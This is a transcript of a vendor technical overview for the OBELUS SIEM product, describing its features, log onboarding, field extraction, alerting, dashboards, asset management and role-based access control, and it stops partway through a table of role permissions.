Technical OverviewUBA Behavior Profiling UBA user and entity behavior analytics analyze user...
Transcript of Technical OverviewUBA Behavior Profiling UBA user and entity behavior analytics analyze user...
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 1
Technical Overview
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 2
Contents OBELUS SIEM .....................................................................................................................................................................5
OBELUS PRODUCT FEATURES & DESCRIPTIONS: ....................................................................................................................................7
DEPLOYMENT OPTIONS ......................................................................................................................................................................9
Single Installed Collector ...........................................................................................................................................................9
Multiple Installed Collectors......................................................................................................................................................9
Cloud or Data Center Deployment ......................................................................................................................................... 10
LOG ON-BOARDING ......................................................................................................................................................... 10
Collector and Source Installation and Configuration ............................................................................................................. 10
Agent Installation and Configuration ..................................................................................................................................... 11
SOURCE CONFIGURATION ................................................................................................................................................................. 11
Manual Configuration: ........................................................................................................................................................... 11
Download Configuration from OBLEUS UI ............................................................................................................................. 11
FIELD EXTRACTION .......................................................................................................................................................................... 13
Create Field Extraction Rule ................................................................................................................................................... 13
Edit Field Extraction Rules ...................................................................................................................................................... 15
EVENT AND ALERT CREATION ........................................................................................................................................... 16
CREATE EVENT ............................................................................................................................................................................... 16
CREATE ALERT ............................................................................................................................................................................... 18
EVENT CORRELATION FILTER ............................................................................................................................................................. 19
CUSTOM FILED ............................................................................................................................................................................... 19
NOTIFICATIONS .............................................................................................................................................................................. 19
Configure Alerts by Email Notification ................................................................................................................................... 20
Configure Alerts by Notable Notification ............................................................................................................................... 20
Configure Alerts by Ticket Notification .................................................................................................................................. 21
DASHBOARDS .................................................................................................................................................................. 22
Edit Widget Configuration ..................................................................................................................................................... 24
Create Dashboard .................................................................................................................................................................. 24
REAL-TIME ALERT MONITORING ...................................................................................................................................... 26
ASSET MANAGEMENT ...................................................................................................................................................... 28
Adding Asset Manually .......................................................................................................................................................... 28
Edit Asset................................................................................................................................................................................ 29
Delete Asset ........................................................................................................................................................................... 30
LOG STORAGE/RETENTION .............................................................................................................................................. 31
OBELUS SIEM SUPPORTS DEVICES AND LOG TYPES: ........................................................................................................................... 31
OBELUS SIEM SUPPORTS OUT OF THE BOX (OOTB) LOGS TYPES: ......................................................................................................... 32
MANAGED SECURITY SERVICE PROVIDERS (MSSP) ............................................................................................................ 33
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 3
Create organization ............................................................................................................................................................... 33
Provision Organization ........................................................................................................................................................... 34
ROLE BASED ACCESS CONTROL (RBAC) ............................................................................................................................. 35
ROLE CAPABILITIES ......................................................................................................................................................................... 35
CREATE ROLE ................................................................................................................................................................................. 38
CREATE USERS ............................................................................................................................................................................... 39
EDIT USERS ................................................................................................................................................................................... 39
INCIDENT RESPONSE PLAN ............................................................................................................................................... 40
CASE MANAGEMENT ....................................................................................................................................................... 41
Creating a case for incident: .................................................................................................................................................. 41
INVESTIGATION GRAPH ................................................................................................................................................... 44
USE CASE: PHISHING E-MAIL ........................................................................................................................................................... 44
Attack Execution .................................................................................................................................................................... 44
Configure Events .................................................................................................................................................................... 44
Configured Notable Events/ Rules ......................................................................................................................................... 47
Investigation for Alert ............................................................................................................................................................ 47
REPORT GENERATION TOOL ............................................................................................................................................................. 50
THREAT INTELLIGENCE ..................................................................................................................................................... 53
What OSINT: .......................................................................................................................................................................... 53
Why OSINT: ............................................................................................................................................................................ 53
Configured OSINT Feed: ......................................................................................................................................................... 53
Create Threat Feed:................................................................................................................................................................ 54
Edit Threat Feed: .................................................................................................................................................................... 56
Delete Threat Feed: ................................................................................................................................................................ 57
MANAGE INDICATOR OF COMPROMISE... ........................................................................................................................................... 58
What Is Indicators of Compromise (IOC): ............................................................................................................................... 58
Create Indicator: .................................................................................................................................................................... 58
Whitelisting: ........................................................................................................................................................................... 59
Bulk White/Blocklist Indicator:............................................................................................................................................... 59
Bulk Upload Indicator: ........................................................................................................................................................... 60
THREAT INTEL DASHBOARD .............................................................................................................................................................. 61
THREAT HUNTING ............................................................................................................................................................ 61
Threat Hunting Methodologies: ............................................................................................................................................. 61
Hypothesis-driven investigation: ............................................................................................................................................ 62
Investigation based on known Indicators of Compromise or Indicators of Attack: ............................................................... 62
Advanced analytics and machine learning investigations: .................................................................................................... 62
HISTORIC LOG SEARCH ..................................................................................................................................................... 62
UBA ................................................................................................................................................................................ 64
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 4
OBELUS UBA Platform ............................................................................................................................................................ 64
Create Use Case for Successful User Logon attempts: ........................................................................................................... 65
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 5
HIGHLIGHTS ✓ Real-time Security Monitoring
✓ Deliver Real-Time Operational Intelligence
✓ Proactively detect and investigate security incidents
✓ Behavior Profiling to understand trends & patterns of activity
✓ Detect & Respond to threat before they impact your business
✓ Visual Incident Response Plan with Customization
✓ Investigation by Graph (Internal & External)
✓ Auto Scalability & Reliability
✓ Threat Hunting (MITRE ATT&CK)
✓ Compliance Monitoring & Reporting
Delivering Combined End-to-End Solution
Collect, Index& Store OBELUS SIEM can collect and index any machine data from virtually
any source, format or location in real time. Data streaming from all
kind of log sources such packaged and custom applications,
application servers, web servers, databases, network devices, virtual
machines, operating systems, Endpoints sensors, mainframes and
much more.
Real-time Monitoring and Alerting Real-time alerts monitoring based on threshold, conditions defined and Auto configure alerts to send notifications emails.
Advance Analytics with OBELUS-SIEM Threat detection with user behavior Analytics and MITRE ATT&CK Monitoring and create actionable Intelligence of known and unknown risks.
Incident Response Platform Inbuilt Incident Response Plans to help Security Analyst respond to cyber threats faster and more efficient.
Threat Intelligence & Collaboration Proactively detect and mitigate threats in your environment with Real-time insight into indicators of compromise (IOC).
Threat Hunting with MITRE ATT&CK Improve proactive and post compromise detection of adversaries in enterprises by illustrating the actions that an attacker may have taken.
UBA Platform Is an incredibly powerful tool to detect compromise early, mitigate risk, and stop an attacker from exfiltrating an organizations data.
Case Management Platform Case Management Platform is fully integrated into advance analytics enabling you to optimize and document analysis.
Threat Investigation Platform Help security teams quickly and efficiently investigate potential cybercrime threats by providing analysts with a holistic view.
Compliance Reporting & Dashboards Having a SIEM is a core part of a number of compliances regimes, such as PCI-DSS, HIPAA, GDPR and ISO 27001.
Asset Management: Platform that helps to track all the registered devices and allow/deny from sending logs to SIEM.
ABOUT OBELUS SIEM
OBELUS SIEM
OBELUS Combined Security Management (CSM) delivers a unified, simple and affordable solution for Security information and Event management (SIEM), Incident Response, Threat detection, Threat analysis, and compliance. Powered by the latest [TMCL] Labs Threat Intelligence and the Global Threat Intelligence from most trusted source for threat intelligence exchange, CSM enables organizations to defend against modern threats proactively. Techno Minds SIEM Platform (OBELUS) combines user and entity behavior analytics (UBA); Threat Intelligence (TI), MITRE ATT&CK and Incident response (IR); Case Management (CM) in a single end-to-end solution OBELUS -Security Information and Event Management (SIEM), equipped to detect cyber threats in real time by using Powerful, scalable, and efficient SIEM Solution and which is built on low latency high throughput platform.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 6
Figure 1: OBELUS Log Collection and Processing.
Security and Log Management With Effective logging and monitoring helps Organization to
protect confidential information and to perform careful trend
analysis, identify significant improvements to their security
management programs.
Log Management (LM) Log collection is the heart and soul of a SIEM, OBELUS collects and
stores log files from operating systems and applications, across
various hosts and systems. OBELUS Platform is designed to scale
without difficulty or costs providing secure data storage at a
reasonable price. This helps you in long-term storage, analysis,
manipulation, and reporting on logs and security records.
Security Event Management (SEM) This focuses on real-time monitoring, correlating events, providing
comprehensive console views, and customizing notifications,
enhance your incident reports and improves your investigations
using security and non-security data collected from across your
organizational infrastructure.
Security Information Management (SIM) OBELUS-SIEM with Combined Security Management (CSM) platform
that provides real-time analysis of security alerts and improves threat
detection and response capabilities in your Organization. Which also
provides long-term storage, analysis, manipulation, and reporting on
logs and security records.
Security Event Correlation (SEC) Which tracks and alerts security analysts, when an abnormal series of
events occurs, such as three failed login attempts under the same user
name on different machines. Improve security operations and
streamline investigations by using ad hoc searches in addition to static,
dynamic and visual correlations.
Log Test Simulator The inbuilt Log simulator in OBELUS - SIEM is a utility tool which allows
its users to simply build real-time events and generate real time logs for
testing. The Log Simulator also allows user to create log templates and
schedule real time logs or on demand which helps users to get events
directly in OBELUS - SIEM, thus helping users to reduce time and efforts
in getting real time logs before integrating any device log.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 7
Figure 2: OBELUS Security Posture Dashboards.
OBELUS Product Features & Descriptions:
OBELUS Product Features & Descriptions
Features Definitions
Indexing Volume Scales to hundreds of terabytes per day
Data On boarding Wizard-based workflow to simplify on boarding of any data source
Auto Scalability & Reliability Ability to support the burst rate of logs generated by the devices at given point of time
UBA Behavior Profiling UBA user and entity behavior analytics analyze user activity from logs to identify malicious behaviors
Visual Incident Response Plan Instructions to help IT staff detect, respond to, and recover from network security incidents
Customizable Incident
Response Plans (IRP) Option to customize the Incident Response Plans according to your needs
Historic Search Ad hoc search across real-time and historical data
Monitoring and Alerting Real-Time Monitor and alerting for individual and correlated real-time events
Reporting Ad hoc and pre-defined reports across real-time and historical data
Dashboards Highly customizable and Inbuilt dashboards for real-time machine data
Customization of Events Customize the events that relevant and correlate based on the events
Data Model Used to define consistent relationships in machine data
Pivot Drag-and-drop UI to explore, manipulate and visualize machine data
Anomaly and Pattern
Detection Automatically discovers patterns, commonalities and anomalies in your data with a single click
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 8
PDF Delivery Scheduled and automated PDF generation and delivery of reports and dashboards
Access Control & Single Sign-
On
Integrated role-based access control and user authentication with LDAP, Active Directory and single
sign-on via SAML
Compliance Monitoring &
Reporting Support and fulfill the compliance needs with Inbuilt platform and reports
Threat Intelligence Threat Intelligence (OSINT & Commercial) & Feed Management
Threat Hunting (MITRE
ATT&CK) Covers APT3 TTP’s that are used by Adversaries
Log Parsing Tool onboard any
log Ease of logs parsing for the devices that needs additional field extractors
Case Management Manage security alerts by creating cases, assigning, documenting artifacts, performing investigation
and tracking resolution.
Asset Management Manage your devices that are On Boarded & reporting logs to OBELUS
WHY OBELUS SIEM
OBELUS Combined Security Management (CSM) delivers a unified, simple and affordable solution that gives you real-time
visibility into all the activities on your IT systems, networks, databases, and applications.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 9
✓ Real Time Monitoring (Low Latency)
✓ Auto scalable platform.
✓ Automated Threat Context.
✓ Highly Customizable.
✓ No scripting or coding skills required.
✓ Custom Report Generation.
✓ OOTB – (Case Management, Threat Intel, Threat Hunting)
HOW IT WORKS
OBELUS receives the logs from various devices via agents, Syslog servers and other forwarders and translates them in Real
Time to meaningful and normalized events and executes configured rules and raises alerts if they match.
Deployment Options You can install agents and configure sources on any mix of OS i.e. Windows, Linux and Mac hosts in your environment. When
deciding where to install agents, consider your network topology, available bandwidth, and domains or user groups.
Single Installed Collector An agent can be installed on any standard server that you use for log aggregation or other network services. For example, you
might decide to centralize collection with just one Collector installed on a dedicated machine, especially if all of your data can
be accessed from a single network location.
Figure 4 a: Single Agent Deployment.
Multiple Installed Collectors If you have a distributed network topology, you can install multiple agents on multiple machines and set up any combination of
sources to collect from your infrastructure.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 10
Figure 4 b: Multi Agent Deployment.
Cloud or Data Center Deployment Agents can be deployed across a cloud or data center wherein, agents on each machine report to OBELUS independently,
sending distinct log data so that you can query against any virtual machine or server in your deployment.
Log On-boarding
An Installed Agent is a GO agent that sends logs and metrics from its Sources and then encrypts, compresses, and sends the
data to the Obelus service. As its name implies, an Installed Agent is installed in your environment, as opposed to a Hosted Log
Collector, which resides on the Obelus service. After installing an Agent, you add Sources, to which the Log Collector connects
to obtain data to send to the Obelus service.
An Obelus Source is an object, configured for a specific Log Collector that scans a particular target periodically and sends newly
available data to the Log Collector. There are a number of Source types in Obelus that work with Installed Agents. Examples
include:
File Sources—Local and Remote File Sources collect logs from selected directories on the Collector host, or a remote one.
Windows Event Log Sources—Local and Remote Windows Event Log Sources collect Windows events from the
Collector host or a remote one.
Windows Performance Monitor Log Sources—Local and Remote Windows Performance Monitor Log
Sources collect Windows performance data from the Collector host, or a remote one.
Docker Sources—Docker Sources collect Docker container logs, events, and stats from Docker.
Collector and Source Installation and Configuration
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 11
This section is an overview of the multiple methods Obelus provides for installing and configuring Agents and Sources.
Agent Installation and Configuration Before installing agent, you need to add the IP address, Mac-address, hostname of device where the agent is going to install.
OBELUS provides multiple methods for installing a Collector:
The following options are available to install Agent
1. Command line installation for windows
2. Rpm/Binary based installation for Linux and Mac OS.
Source configuration
Manual Configuration: You can set up as many as 1,000 Sources on a given Agent. A Source should be configured to collect similar data types. For
example, you might set up three Local File Sources to collect router activity logs from three locations, and another Local File
Source to collect logs from a web application.
Each Source is tagged with its own metadata, like log_type, log_device. The more Sources you set up, the easier it is to isolate
one of the Sources in a search since each Source can be identified by its metadata.
When you configure Sources that read from log files, you specify a path expression that defines what files to scan. You can
optionally configure a blacklist of files to exclude from collection.
You can create Sources using the OBELUS web app at any time after Collector installation. For source-specific instructions, see
the topics below Sources for Installed Collectors.
Alternatively, you can define Sources for an Installed Collector in a UTF-8 encoded JSON file, in which case you must provide the
file when starting the Collector for the first time. For more information, see Use JSON to Configure Sources. Note that if you
provide the Sources configuration in a JSON file, you can no longer manage the Sources through the OBELUS web app.
Download Configuration from OBLEUS UI
Optionally you download the configuration from UI as well.
• Logon to OBLEUS
• Navigate to Settings
• Click on Data Input
• Select the Log Shippers menu
• Select the device that you on board
• Click on Configuration Wizard
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 12
• Select log device, log type and click on create YML button.
Figure 5: OBELUS OOTB log source support.
Figure 6: Windows Collector
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 13
Field Extraction
Field extractions allow you to parse fields from your log messages at the time the messages are ingested, which eliminates the
need to parse fields at the query level. With Field Extraction Rules (FERs) in place, users can use the pre-parsed fields for ad-
hoc searches, scheduled searches, real-time alerts, and dashboards. In addition, field extraction rules help standardize field
names and searches, simplify the search syntax and scope definition, and improve search performance.
You need the Manage field extraction rules role capability to create a field extraction rule.
Figure 7: Extract Fields
The Settings > Configuration > Extract Fields page displays the following information:
• Rule name,
• Log Device,
• Log Type
• Create date and time by user
• Last modified date and time by user
On the Settings > Configuration > Extract Fields page you can:
• Create a Field Extraction Rule
• Search Field Extraction Rules
• Edit a Field Extraction Rule
• Delete a Field Extraction Rule
• See Details of a Field Extraction Rule
Create Field Extraction Rule 1. To create a Field Extraction Rule:
2. Go to Manage Data > Settings > Field Extraction Rules.
3. Click Add.
4. Enter the following options:
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 14
• Parser Name. Type a name that makes it easy to identify the rule.
• Parser Description. Type description for more information
• Log Device: Select the log device that you want to apply parser
• Log Type: Select the log type that you want apply parser.
• Parser Type: Select the Parser type like JSON, Delimiter and Regex.
5. Search existing log messages by selecting time range and search query option
Figure 8: Log Messages
6. Select Log message to apply rule
7. Expand Regex and Select the Field to apply Regex.
Figure 9: Expand Regex
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 15
8. Select and click the field value in the message, to be extracted as a new field.
9. Provide a name for this field. Specify the prefix and suffix to the field value.
10. Click Create Show Patterns to generate a parser rule or regex (regular expression) pattern. it will show possible regular
expressions or you can add your own regular expression as well
11. Click on apply to generate regular expression for selected log message
12. You can add optionally add condition that specific to rules.
13. In the below case it will apply rule only when message contains 83.149.9.216 IP Address.
Figure 10: Applying rule
Edit Field Extraction Rules Changes to Field Extraction Rules are implemented immediately. Additionally, you can save a copy of a rule and make edits to
the new version of the rule without making any changes to the original rule.
1. Go to Manage Data > Settings > Field Extraction Rules. 2. Click on view details link
Figure 11: Field Extraction Rules
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 16
Figure 12: Extract Fields
3. Click on Edit Parser Button
Figure 13: Extract Fields Edit Parse
4. Change any text for Rule Name, Parser Name, or Log Device or Log Type or Parser Expression. Click Save.
Event and Alert Creation Events provide information about the systems that produce the metadata. The term event data refers to the contents of an
OBELUS index.
Create Event 1. Create a new event From the OBELUS Main page in the Settings > Configuration,
2. Select New events> Events. Right Click>Select New Category (Example: New Node name the Event category)
3. Right Click>New Category> New Event
4. New Event > Event Information
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 17
5. From the Event Information page add the following event information to configure the new event.
• Enter an Event Name
• Enter a Description for the event that describes why you created the event.
• (Optional) Select a Log Device
• (Optional) Select a Severity
• (Optional) Select a Category
• (Optional) Select a Tags
• (Optional) Select Data Enrichment
• (Optional) Select Event Fields
• (Optional) Select Event Filter
• Select required Fields
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 18
Event Filter > Add rule with AND/ OR conditions.
• Select Log Field
• Fields related to events
• Value can be any thing
The above following steps are the same for Add group with AND OR conditions. Save the work.
Create Alert
You can manually create a notable event from Existing events. From the OBELUS Main page in the Settings,
1. Select New events> Notable Events. Right Click> Select New Category
2. (Egg: New Node name the Notable Event category)
3. Right Click>New Category> New Event
4. New Event > Notable Event Information
5. Enter an Event Name
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 19
6. Enter a Description for the event that describes why you created the notable event or what needs to be investigated.
7. (Optional) Select a Severity
8. (Optional) Select a Category
9. (Optional) Select a Tags
10. Select required Fields
Event Correlation Filter OBELUS comes with inbuilt use cases based on the events and also supports event correlation
1. Select related Event
2. Select Aggregation Type calculates an approximate count of distinct values or such as count of unique
values
3. (Optional) Select an Aggregation Fields
4. (Optional) Select an Operator (greater than/less than/equal)
5. (Optional) Select a value
6. (Optional) Select a Time
7. (Optional) Select a Time Unit (Days/Hours/Minutes/Seconds)
Custom Filed You can add many more Custom fields by Add Row and drop down more custom fields in Key, values.
Notifications You can configure the alert notification with below options.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 20
• Configure alert Notification
• Configure alerts by Email notification
• Configure alerts by Notable notification
• Configure alerts by Ticket notification
Configure Alert Notification
• Specify conditions for triggering the alert-based on number of result counts.
• Set number results meets the trigger conditions like greater than, less than or equal.
• Specify an optional field values to trigger an alert in real time.
Configure Alerts by Email Notification
Send an email notification to specified recipients when an alert trigger. Email notifications can include information of alert
triggering. You can set up an email notification action from the Notable event page.
1. Click Notifications and select Email
2. Type a comma-separated list of to email recipients.
3. (Optional) Provide the email Subject and Message
Configure Alerts by Notable Notification
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 21
1. Enter a Title of Notable event
2. Enter a Description for the event that describes why you created the notable event or what needs to be investigated.
3. Enter a message of alert described across your network applications, systems, and devices.
4. Enter Drill-down name of alert data received from a specific input.
5. Enter Drill-down can perform the actions for fields, tags, and event segments.
6. (Optional) Select an IRP (Incident Response Plan)
Configure Alerts by Ticket Notification
1. Enter a Title of Ticket
2. Enter a Description for the event that describes why you created the notable event or what needs to be investigated.
3. (Optional) Select a Priority
4. Enter Assignee search of user Email-Id.
5. To save the new notable event Click on Create Event.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 22
Dashboards Dashboards are powerful forensic tool to create searches and view search results based on data available through a search.
• If you’re having problems with your systems or network, you can easily move backward in time to pinpoint exactly
when the problems occurred, and analyze additional search results to uncover the root cause.
• Reports and long-term trend analysis provide historical context and are useful in any situations in which live data isn’t
as relevant as historical data.
• Dashboards populate completely every time you launch them and backfill data as needed. This means there will be a
delay before you see all the data. If you change a time range, the data panels will rerun the search.
• In Live Mode, dashboards provide a real-time view of your system, continually updating as data comes in.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 23
Dashboards contain a collection of panels:
• Widgets provide a graphical representation in the form of a chart of your organization's data.
• Text and Title Panels allow you to add context to the data in the dashboard.
Below are the steps to create the widgets.
1. Go to Settings > Widgets > New Widget.
2. Enter the title of widget
3. Choose the events or rules or cases or alerts
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 24
Figure 14: Manage Widgets
4. Click on Preview button and following options will be displayed a. Expand fields to do aggregation for selected logs
b. Select the chart type that you want to display
c. Drag selected the log fields in order to display data on chart
d. Drag log field to value field in order to perform the aggregation on selected field
5. Click on Preview button to preview widget
6. Click on Submit to save the widget
Edit Widget Configuration
• Go to Settings > Widgets > Edit Widget option in Table.
• Enter the title of widget
• Click on Preview button and following options will be displayed
• Expand fields to do aggregation for selected logs
• Select the chart type that you want to display
• Drag selected the log fields in order to display data on chart
• Drag log field to value field in order to perform the aggregation on selected Field
• Click on Preview button to preview widget
• Click on Submit to save the widget
Create Dashboard
1. Go to Settings > Dashboards
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 25
2. Right click on the category and Click on New Category Link
Figure 15: Create Dashboard
3. Click on the pencil icon right top corner 4. Enter title of the Dashboard 5. Select Permission Type 6. Select Category of Dashboard 7. Choose required permission for dashboard visibility.
Figure 16: Dashboard Visibility
8. Click on Close Button 9. Click on Plus sign to choose available widgets 10. Click on Tick sign button to save changes.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 26
Figure 17: Widgets
Real-Time Alert Monitoring
OBELUS SIEM capable in detecting threats and raising Real Time alerts if analysis shows that an activity runs against
predetermined rule sets and thus indicates a potential security issue.
1. Login with Valid Username & Password 2. Click on the “Alerts ” tab on the header bar 3. Select the time range accordingly to view alerts 4. Alerts are group by rule/alert name, select the alert you wish to investigate 5. Click (>) drill down option to view the individual alert 6. Click the checkbox to see the events details 7. Click on Event Count value to view the fields such as username, src IP etc 8. Search option can be used for faster searching alerts by priority, category, timestamp etc 9. Analyst can add additional fields from the filter tab if required during analysis 10. If Analyst wants to investigate the alert he/she can create case by clicking the “Add To Case” 11. If Analyst wants to perform deep dive investigation, he/she can create Investigation by clicking the “Add To
Investigation”
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 27
Figure 18: OBELUS Real-Time Threat Monitoring Console.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 28
Asset Management
Assets and asset profiles that are created for servers and hosts in your network provide important information to assist you in resolving security issues. Using the asset data, you can connect offenses that are triggered in your system to physical or virtual assets to provide a starting point in a security investigation.
The Assets tab OBELUS provides a unified view of the known information about the assets in your network. As OBELUS discovers more information, the system updates the asset profile and incrementally builds a complete picture about the asset.
Asset profiles are built dynamically from identity information that is passively absorbed from event data that OBELUS actively looks for during a vulnerability scan. You can also import asset data or edit the asset profile manually.
This Assert information will also be helpful to maintain the licenses as well.
Sources of asset data:
• Asset data is received from several different sources in your OBELUS deployment.
Asset data is received from several different sources in your OBELUS deployment.
Asset data is written to the asset database incrementally, usually 2 or 3 pieces of data at a time. With exception of updates from network vulnerability scanners, each asset update contains information about only one asset at a time.
Asset data usually comes from one of the following asset data sources:
• Events
Event payloads, such as those created by DHCP or authentication servers, often contain user logins, IP addresses, host names, MAC addresses, and other asset information. This data is immediately provided to the asset database to help determine which asset the asset update applies to.
Events are the primary cause for asset growth deviations.
• User interface
Users who have the Assets role can import or provide asset information directly to the asset database. Asset updates that are provided directly by a user are for a specific asset.
Adding Asset Manually
1. Go to Settings > Assets > Assets. 2. Assets page will display with IP Address, Host Name, Mac Address
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 29
Figure 19: Assets
3. Click on New Asset Button
Figure 20: New Asset
4. Enter Source IP 5. Enter Hostname 6. Mac Address 7. Click save button to confirm changes.
Edit Asset
1. Go to Settings > Assets > Assets. 2. Assets page will display with IP Address, Host Name, Mac Address 3. Select the table row that you want to edit.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 30
–
Figure 21: Edit Asset
4. Click on Edit button and enter the update source IP, hostname, Mac address 5. Click on the save button to persists changes.
Delete Asset
1. Go to Settings > Assets > Assets. 2. Assets page will display with IP Address, Host Name, Mac Address 3. Select the table row that you want to delete 4. Click on delete button to delete the selected rows
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 31
Log Storage/Retention
The following table shows the default storage configuration
Default storage configurations for OBELUS Components
OBELUS Storage configuration
Short Term Store <= 30 days SSD
Mid Term Storage >= 30 <= 365 days S3 Buckets
Long Term Storage > 1 Year Glacier
OBELUS SIEM Supports Devices and Log Types:
Vendor Name Device Type Log Type
Check Point Check Point Firewall OPSEC
Amazon CloudTrail Generic API
Apple Inc. Mac OS X Applications/Host/Server/ Operating Systems/Web Content/Filtering/Proxies Syslog
Barracuda Networks Web Application Firewall Security Appliances/UTMs Syslog
Web Filter Security Appliances/UTMs Syslog
Spam Firewall Security Appliances/UTMs Syslog
Blue Coat ProxySG Web Content/Filtering/Proxies Syslog
Bro Network Security Monitor
Bro Network Security Monitor
Network Security Syslog
Cisco DDoS Mitigator IDS/IPS Syslog
Identity Services Engine Other Syslog
IOS Firewall Firewall/Network Switches and Routers Syslog
IOS IDS IDS/IPS/Network Switches and Routers Syslog
Iron Port Email Security Email Security Syslog
Iron Port Web Security Appliance
Web Content/Filtering/Proxies Syslog
Open TACACS+ Authentication Syslog
PIX IDS IDS/IPS/Network Switches and Routers Syslog
PIX/ASA/FWSM Firewall/IDS/IPS Syslog
Secure ACS IDS/IPS Syslog
NetScaler Web Content/Filtering/Proxies Syslog
Secure Gateway Web Content/Filtering/Proxies Syslog
CyberArk Enterprise Password Vault Application Syslog
Privileged Identity Management Suite -CEF
Application Syslog
Privileged Threat Analytics UBA Syslog
Cyberoam Cyberoam UTM and NGFW UTM/Firewall Syslog
Cylance Cylance PROTECT Antivirus Syslog
Dell Sonic WALL SonicOS Firewall Syslog
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 32
FireEye FireEye Malware Protection Antivirus/Malware Syslog
Fidelis Fidelis Network Security Appliance Syslog
Fortinet FortiGate Antivirus Antivirus Syslog
FortiGate Firewall Firewall Syslog
FortiGate IDS IDS/IPS Syslog
Imperva WAF Web Content Syslog
Juniper Networks NetScreen Firewall Firewall Syslog
NetScreen IDP IDS/IPS Syslog
JUNOS Router Network Switches and Routers Syslog
Kaspersky Malware Protection Antivirus SQL
Malwarebytes Malware Protection Antivirus SQL
Microsoft Microsoft Active Directory All Type WMI
Microsoft Exchange Server 2010 WMI
MicrosoftSQLServer All Type WMI
Oracle Oracle Database Syslog
Oracle Audit Database Syslog
Palo Alto Networks Firewall Firewall Syslog
Proofpoint Email Security Gateway Application Syslog
OBELUS SIEM Supports Out of the Box (OOTB) logs types: OBELUS SIEM has robust out-of-the-box functionality to support logs as listed in diagram.
Figure 22: OBELUS OOTB log source support.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 33
Managed Security Service Providers (MSSP)
The use of managed security service providers (MSSP) continues to see an upward trend as demands for external support
invariably grows. Smaller to mid-sized organizations can now keep up with the dynamic threat landscape, while larger
enterprises are using managed security services to maximize their capabilities. Motivation to seek third-party support includes
lack of internal resources to manage a SIEM deployment and to perform real-time alert monitoring, or lack of expertise to
expand into new use cases.
Obelus has capability to on board multiple clients on single platform.
Following instruction to create or edit organizations.
Create organization
1. Go Settings > Users & Authentication > Manage Users
2. Click on Organizations tab. You can list of child organizations under your Organizations
3. Click on New Organization to create new Organization.
4. Enter the Name, Upload logo
5. Click on save button to create Organization.
Figure 23: Create Organization
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 34
Provision Organization
1. Go Settings > Users & Authentication > Manage Users 2. Click on Organizations tab. You can list of child organizations under your Organizations 3. Select Organization that you want provision. 4. Click on Provision Button 5. Once Provision was completed. The users that are assigned to Company will able to login and perform their operations
Figure 24: Manage Users
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 35
Role Based Access Control (RBAC)
Role-based access control provides flexible and effective tools that you can use to protect OBELUS data.
OBELUS masks data to the user much like the way a relational database manages role-based access control. In some cases total segmentation of data may be necessary. In other cases, controlling the searches and results at the presentation layer may meet your security needs.
Consider your use cases when deciding how to set up your configurations and whether role-based access might fit your needs. For example:
• For extremely sensitive data, where even allowing access to a system that might have sensitive data incurs legal risk, consider installing and configuring more than one instance of OBELUS, and then configuring each instance with the data for the appropriate audience.
1. When intentionally or unintentionally exposing sensitive data to the wrong user might incur legal ramifications, and then consider creating indexes specifically for privileged and non-privileged accounts and assigning them to roles created for each level of access.
• When there are security concerns but not so much legal risk, you can restrict access using Apps. For example, you can create an App with static dashboards and assign roles with lower clearance to those dashboards, limiting the type of information the user assigned to the role may access.
• Field encryption (optional feature), search exclusions, and field aliasing to redacted data are also great ways to tighten up a limited search case. If you have a limited search case and only able to search some specific data from a shared index, you can restrict shared reports to restrict ad hoc searches and funneling summary indexing into an index that is secured.
By Default, OBELUS will provide the Two Roles
1. Administration – Administration which will have access all the organizations and he has permission to enable or disable some features to Organizations.
2. Company Admin – Company Admin can be admin for his organization and his sub organization and he can’t enable or disable features to Organizations.
Role Capabilities
Capability Description.
Add User Permission to create user
View User Permission to view user
Delete User Permission to delete user
Update User Permission to update user
Add Groups Permission to Add Groups
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 36
Update Groups Permission to Update Groups
View Groups Permission to View Groups
Delete Groups Permission to delete Groups
Add Roles Permission to add Roles
Update Roles Permission to update Roles
View Roles Permission to view Roles
Delete Roles Permission to delete Roles
Add Dashboards Permission to add Dashboards
Update Dashboards Permission to update Dashboards
View Dashboards Permission to view Dashboards
Delete Dashboards Permission to delete Dashboards
Add Visualizations Permission to add Visualizations
Update Visualizations Permission to update Visualizations
View Visualizations Permission to view Visualizations
Delete Visualizations Permission to delete Visualizations
Search Console Permission to View Historical Search
Add Rules Permission to add Rules
Update Rules Permission to update Rules
View Rules Permission to view Rules
